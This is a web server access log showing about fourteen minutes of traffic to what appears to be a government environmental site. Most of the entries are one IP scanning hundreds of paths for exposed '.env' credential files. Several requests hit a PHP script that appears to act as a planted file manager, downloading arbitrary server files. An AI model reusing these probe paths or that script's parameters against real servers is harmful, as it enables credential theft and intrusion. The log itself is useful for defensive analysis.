195.154.91.103 - - [27/Jun/2024:05:13:56 -0500] "GET /ClientApp/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:13:56 -0500] "GET /challenge/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:13:57 -0500] "GET /laravel2/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:13:57 -0500] "GET /MyRentals.Web/ClientApp/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:13:57 -0500] "GET /tiedostot/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:13:58 -0500] "GET /saas/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:13:58 -0500] "GET /examples/.env HTTP/1.1" 503 1020
195.154.91.103 - - [27/Jun/2024:05:13:59 -0500] "GET /.env_sample HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:14:00 -0500] "GET /staticfiles/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:14:00 -0500] "GET /aws.env HTTP/1.1" 404 1018
66.249.66.11 - - [27/Jun/2024:05:14:00 -0500] "GET /BLA/resoluciones/RESOLUCIONES%201993/RESOLUCION%2042%20DE%201993%20.pdf HTTP/1.1" 200 55397
195.154.91.103 - - [27/Jun/2024:05:14:00 -0500] "GET /example/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:14:01 -0500] "GET /services/deployment-agent/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:14:01 -0500] "GET /test/bdd/fixtures/demo/openapi/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:14:01 -0500] "GET /frontend/vue/.env HTTP/1.1" 404 1018
66.249.66.13 - - [27/Jun/2024:05:14:02 -0500] "GET /BLA/resoluciones/AUTOS%202023/1029.pdf HTTP/1.1" 200 409150
195.154.91.103 - - [27/Jun/2024:05:14:02 -0500] "GET /tests/default_settings/v11.0/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:14:02 -0500] "GET /oss HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:14:02 -0500] "GET /server/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:14:03 -0500] "GET /Development/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:14:03 -0500] "GET /test/bdd/fixtures/did-method-rest/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:14:03 -0500] "GET /babel-plugin-dotenv/test/fixtures/prod-env/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:14:04 -0500] "GET /Server_with_db/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:14:04 -0500] "GET /name/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:14:04 -0500] "GET /agora/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:14:05 -0500] "GET /errors/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:14:05 -0500] "GET /hotpot-app-frontend/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:14:05 -0500] "GET /dataset2/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:14:06 -0500] "GET /base_dir/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:14:06 -0500] "GET /tests/default_settings/v13.0/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:14:06 -0500] "GET /.env~ HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:14:07 -0500] "GET /Archipel/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:14:07 -0500] "GET /example02-golang-package/import-underscore/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:14:07 -0500] "GET /playground/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:14:08 -0500] "GET /api1/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:14:08 -0500] "GET /ftpmaster/.env HTTP/1.1" 404 1018
201.245.192.253 - - [27/Jun/2024:05:14:08 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
195.154.91.103 - - [27/Jun/2024:05:14:08 -0500] "GET /..staging/ HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:14:09 -0500] "GET /images/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:14:09 -0500] "GET /Nodejs-Projects/play-ground/ManageUserRoles/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:14:10 -0500] "GET /mail/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:14:10 -0500] "GET /examples/sdl-first/.env HTTP/1.1" 503 1020
17.241.227.72 - - [27/Jun/2024:05:14:11 -0500] "GET /secretaria-de-ambiente-libera-gavilan-y-otras-aves-silvestres-en-los-cerros-orientales.html HTTP/1.1" 200 854
195.154.91.103 - - [27/Jun/2024:05:14:11 -0500] "GET /Api/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:14:12 -0500] "GET /rails-api/react-app/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:14:12 -0500] "GET /vue/vuecli/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:14:12 -0500] "GET /deploy/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:14:13 -0500] "GET /api3/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:14:13 -0500] "GET /cron/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:14:13 -0500] "GET /old/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:14:14 -0500] "GET /react_todo/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:14:14 -0500] "GET /lib/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:14:14 -0500] "GET /web-dist/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:14:15 -0500] "GET /backup/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:14:15 -0500] "GET /packages/plugin-analytics/src/fixtures/analytics-ga-key/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:14:15 -0500] "GET /grems-api/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:14:16 -0500] "GET /docs/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:14:16 -0500] "GET /examples/vue-dashboard/backend/.env HTTP/1.1" 503 1020
195.154.91.103 - - [27/Jun/2024:05:14:17 -0500] "GET /urlmem-app/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:14:18 -0500] "GET /static_user/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:14:18 -0500] "GET /app/frontend/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:14:18 -0500] "GET /pt2/countries/src/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:14:19 -0500] "GET /Api1/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:14:19 -0500] "GET /django_project_path/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:14:19 -0500] "GET /babel-plugin-dotenv/test/fixtures/dev-env/.env HTTP/1.1" 404 1018
47.128.20.241 - - [27/Jun/2024:05:14:19 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021&f=2952.pdf&ft=download HTTP/1.1" 200 519847
195.154.91.103 - - [27/Jun/2024:05:14:20 -0500] "GET /.env_1 HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:14:20 -0500] "GET /env_1/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:14:20 -0500] "GET /test/bdd/fixtures/openapi-demo/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:14:21 -0500] "GET /processor/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:14:21 -0500] "GET /administrator/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:14:21 -0500] "GET /resources/docker/phpmyadmin/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:14:22 -0500] "GET /examples/with-cookie-auth-fauna/.env HTTP/1.1" 503 1020
195.154.91.103 - - [27/Jun/2024:05:14:23 -0500] "GET /packages/web/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:14:23 -0500] "GET /app/code/community/Nosto/Tagging/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:14:24 -0500] "GET /Sources/API/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:14:24 -0500] "GET /laravel/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:14:24 -0500] "GET /test/bdd/fixtures/demo/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:14:25 -0500] "GET /examples/with-universal-configuration-build-time/.env HTTP/1.1" 503 1020
195.154.91.103 - - [27/Jun/2024:05:14:26 -0500] "GET /asset/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:14:26 -0500] "GET /site/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:14:27 -0500] "GET /layout/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:14:27 -0500] "GET /rabbitmq-cluster/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:14:27 -0500] "GET /jsrelay/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:14:28 -0500] "GET /img/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:14:28 -0500] "GET /fixtures/kitchensink/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:14:28 -0500] "GET /upload/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:14:29 -0500] "GET /mailman/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:14:29 -0500] "GET /babel-plugin-dotenv/test/fixtures/as-alias/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:14:29 -0500] "GET /gists/pusher HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:14:30 -0500] "GET /base/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:14:30 -0500] "GET /.env.example HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:14:30 -0500] "GET /master/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:14:31 -0500] "GET /niffler-frontend/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:14:31 -0500] "GET /services/portainer/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:14:31 -0500] "GET /resources/docker/.env HTTP/1.1" 404 1018
216.244.66.195 - - [27/Jun/2024:05:14:32 -0500] "GET /BLA/resoluciones/AUTOS%202023/3253.pdf HTTP/1.1" 200 417378
195.154.91.103 - - [27/Jun/2024:05:14:32 -0500] "GET /Chai/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:14:32 -0500] "GET /includes/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:14:32 -0500] "GET /Core/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:14:33 -0500] "GET /packages/plugin-qiankun/examples/app2/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:14:33 -0500] "GET /install/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:14:34 -0500] "GET /dotfiles/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:14:34 -0500] "GET /vod_installer/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:14:34 -0500] "GET /tests/default_settings/v9.0/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:14:35 -0500] "GET /postfixadmin/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:14:35 -0500] "GET /unixtime/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:14:35 -0500] "GET /front/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:14:36 -0500] "GET /tests/default_settings/v10.0/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:14:36 -0500] "GET /src/renderer/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:14:36 -0500] "GET /storage/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:14:37 -0500] "GET /08-routing/end/vue-heroes/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:14:37 -0500] "GET /tests/default_settings/v8.0/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:14:37 -0500] "GET /target/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:14:38 -0500] "GET /stag/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:14:38 -0500] "GET /robots/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:14:38 -0500] "GET /config/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:14:39 -0500] "GET /routes/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:14:39 -0500] "GET /assets/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:14:39 -0500] "GET /legal/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:14:40 -0500] "GET /src/main/resources/archetype-resources/__rootArtifactId__-acceptance-test/src/test/resources/app-launcher-tile/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:14:40 -0500] "GET /09-managing-state/end/vue-heroes/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:14:40 -0500] "GET /films/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:14:41 -0500] "GET /docker/compose/withPostgres/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:14:41 -0500] "GET /items/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:14:41 -0500] "GET /backend/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:14:42 -0500] "GET /mindsweeper/gui/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:14:42 -0500] "GET /production/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:14:42 -0500] "GET /Kubernetes/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:14:43 -0500] "GET /blob/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:14:43 -0500] "GET /fixtures/fiber-debugger/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:14:43 -0500] "GET /tests/default_settings/v7.0/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:14:44 -0500] "GET /front/src/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:14:44 -0500] "GET /ledger_sync/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:14:44 -0500] "GET /temanr9/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:14:45 -0500] "GET /micro-app-react-communication/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:14:45 -0500] "GET /Production/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:14:45 -0500] "GET /uploads/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:14:46 -0500] "GET /image_data/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:14:46 -0500] "GET /mentorg-lava-docker/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:14:46 -0500] "GET /system-config/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:14:47 -0500] "GET /templates/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:14:47 -0500] "GET /noVNC/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:14:47 -0500] "GET /site-library/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:14:48 -0500] "GET /engine/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:14:48 -0500] "GET /fonts/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:14:48 -0500] "GET /setup/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:14:49 -0500] "GET /examples/05-migrations/.env HTTP/1.1" 503 1020
195.154.91.103 - - [27/Jun/2024:05:14:50 -0500] "GET /babel-plugin-dotenv/test/fixtures/default/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:14:50 -0500] "GET /login/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:14:51 -0500] "GET /counterblockd/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:14:51 -0500] "GET /rust-backend/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:14:51 -0500] "GET /docker/examples/compose/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:14:52 -0500] "GET /basic-network/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:14:52 -0500] "GET /.env.stage HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:14:52 -0500] "GET /repos/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:14:53 -0500] "GET /3-sequelize/final/.env HTTP/1.1" 404 1018
47.128.113.126 - - [27/Jun/2024:05:14:51 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021&f=2757.pdf&ft=download HTTP/1.1" 200 376487
195.154.91.103 - - [27/Jun/2024:05:14:53 -0500] "GET /environments/production/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:14:53 -0500] "GET /Final_Project/Airflow_Dag/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:14:54 -0500] "GET /legacy/tests/9.2.0 HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:14:54 -0500] "GET /app1-static/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:14:54 -0500] "GET /well-known/.env HTTP/1.1" 404 1018
201.245.192.253 - - [27/Jun/2024:05:14:55 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
195.154.91.103 - - [27/Jun/2024:05:14:55 -0500] "GET /localhost/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:14:55 -0500] "GET /log/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:14:55 -0500] "GET /code/web/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:14:56 -0500] "GET /HUNIV_migration/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:14:56 -0500] "GET /sites/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:14:56 -0500] "GET /restapi/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:14:57 -0500] "GET /.local HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:14:57 -0500] "GET /server/src/persistence/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:14:57 -0500] "GET /env/dockers/php-apache/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:14:58 -0500] "GET /examples/with-react-relay-network-modern/.env HTTP/1.1" 503 1020
195.154.91.103 - - [27/Jun/2024:05:14:59 -0500] "GET /Modix/ClientApp/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:14:59 -0500] "GET /public_root/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:15:00 -0500] "GET /upfiles/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:15:00 -0500] "GET /challenges/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:15:00 -0500] "GET /packages/react-scripts/fixtures/kitchensink/template/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:15:01 -0500] "GET /ADMINISTRATOR/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:15:01 -0500] "GET /linux/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:15:02 -0500] "GET /cmd/testdata/expected/dot_env/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:15:02 -0500] "GET /front-app/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:15:02 -0500] "GET /packages/client/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:15:03 -0500] "GET /anaconda/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:15:03 -0500] "GET /ch8a-mytodo/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:15:03 -0500] "GET /files/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:15:04 -0500] "GET /resourcesync/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:15:04 -0500] "GET /.env.prod HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:15:04 -0500] "GET /fisdom/fisdom/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:15:05 -0500] "GET /logging/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:15:05 -0500] "GET /test-network/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:15:05 -0500] "GET /websocket/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:15:06 -0500] "GET /Administrator/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:15:06 -0500] "GET /configs/.env HTTP/1.1" 404 1018
195.154.91.103 - - [27/Jun/2024:05:15:06 -0500] "GET /sitemaps/.env HTTP/1.1" 404 1018
201.245.192.253 - - [27/Jun/2024:05:15:08 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.115.73 - - [27/Jun/2024:05:15:28 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021&f=4516.pdf&ft=download HTTP/1.1" 200 372391
47.128.113.118 - - [27/Jun/2024:05:15:59 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Cxampp&f=lang.tmp&ft=download HTTP/1.1" 200 2
201.245.192.253 - - [27/Jun/2024:05:16:08 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.112.72 - - [27/Jun/2024:05:16:33 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbreclima%5Cwp-includes&f=kses.php&ft=download HTTP/1.1" 200 43101
201.245.192.253 - - [27/Jun/2024:05:17:08 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
17.241.227.226 - - [27/Jun/2024:05:17:19 -0500] "GET /semana-santa-caminos-de-los-cerros-siguen-cerrados-de-forma-preventiva.html HTTP/1.1" 200 909
201.245.192.253 - - [27/Jun/2024:05:18:08 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [27/Jun/2024:05:17:20 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 14506
201.245.192.253 - - [27/Jun/2024:05:18:20 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 35528
216.245.221.92 - - [27/Jun/2024:05:18:22 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [27/Jun/2024:05:16:57 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [27/Jun/2024:05:19:08 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [27/Jun/2024:05:17:48 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57889
201.245.192.253 - - [27/Jun/2024:05:19:28 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 35358
201.245.192.253 - - [27/Jun/2024:05:19:53 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
66.249.66.12 - - [27/Jun/2024:05:20:03 -0500] "GET /BLA/resoluciones/AUTOS%202023/2587.pdf HTTP/1.1" 200 2791467
201.245.192.253 - - [27/Jun/2024:05:20:08 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [27/Jun/2024:05:20:14 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 35528
172.22.2.4 - - [27/Jun/2024:05:20:43 -0500] "GET /BLA/boletinlegal/Directivas/2015/Directiva%20No.%2001%20del%2014%20de%20Enero%20de%202015.pdf HTTP/1.1" 304 -
66.249.66.12 - - [27/Jun/2024:05:21:04 -0500] "GET /Publicaciones/2024EE96616.pdf HTTP/1.1" 404 227
66.249.66.11 - - [27/Jun/2024:05:21:04 -0500] "GET /BLA/resoluciones/AUTOS%202023/3183.pdf HTTP/1.1" 200 1373644
66.249.66.11 - - [27/Jun/2024:05:21:05 -0500] "GET /autoliquidacion/index.php?dir=Solicitudes%20relacionadas%20con%20calidad%20del%20aire%20auditiva%20y%20visual/Evaluaci%F3n%20para%20Certificaci%F3n%20en%20materia%20de%20Revisi%F3n%20de%20Gases/&sort=name&order=asc HTTP/1.1" 200 3715
66.249.66.11 - - [27/Jun/2024:05:21:05 -0500] "GET /Publicaciones/2024EE79012.pdf HTTP/1.1" 404 227
66.249.66.11 - - [27/Jun/2024:05:21:06 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 200 50058
201.245.192.253 - - [27/Jun/2024:05:21:08 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
52.167.144.230 - - [27/Jun/2024:05:22:06 -0500] "GET /BLA/resoluciones/AUTOS%202022/6012.pdf HTTP/1.1" 304 -
66.249.66.11 - - [27/Jun/2024:05:22:06 -0500] "GET /BLA/resoluciones/AUTOS%202023/3341.pdf HTTP/1.1" 200 967132
52.167.144.230 - - [27/Jun/2024:05:22:06 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/0207.pdf HTTP/1.1" 200 114742
201.245.192.253 - - [27/Jun/2024:05:22:08 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [27/Jun/2024:05:23:08 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.245.221.92 - - [27/Jun/2024:05:23:22 -0500] "HEAD / HTTP/1.1" 200 -
66.249.66.11 - - [27/Jun/2024:05:24:06 -0500] "GET /BLA/resoluciones/AUTOS%202020/3046.pdf HTTP/1.1" 200 379852
201.245.192.253 - - [27/Jun/2024:05:24:08 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [27/Jun/2024:05:22:47 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [27/Jun/2024:05:24:51 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
201.245.192.253 - - [27/Jun/2024:05:25:08 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [27/Jun/2024:05:23:38 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55823
66.249.66.12 - - [27/Jun/2024:05:26:07 -0500] "GET /BLA/resoluciones/AUTOS%202023/3444.pdf HTTP/1.1" 200 460007
201.245.192.253 - - [27/Jun/2024:05:26:08 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
17.241.219.31 - - [27/Jun/2024:05:26:44 -0500] "GET /recuperados-1-5-kilos-de-musgo-distrito-hace-un-llamado-para-que-no-se-extraiga-o-comercialice-esta-especie.html HTTP/1.1" 200 865
201.245.192.253 - - [27/Jun/2024:05:27:08 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
52.167.144.230 - - [27/Jun/2024:05:27:09 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/6857.pdf HTTP/1.1" 304 -
159.89.106.7 - - [27/Jun/2024:05:27:18 -0500] "GET / HTTP/1.1" 200 4720
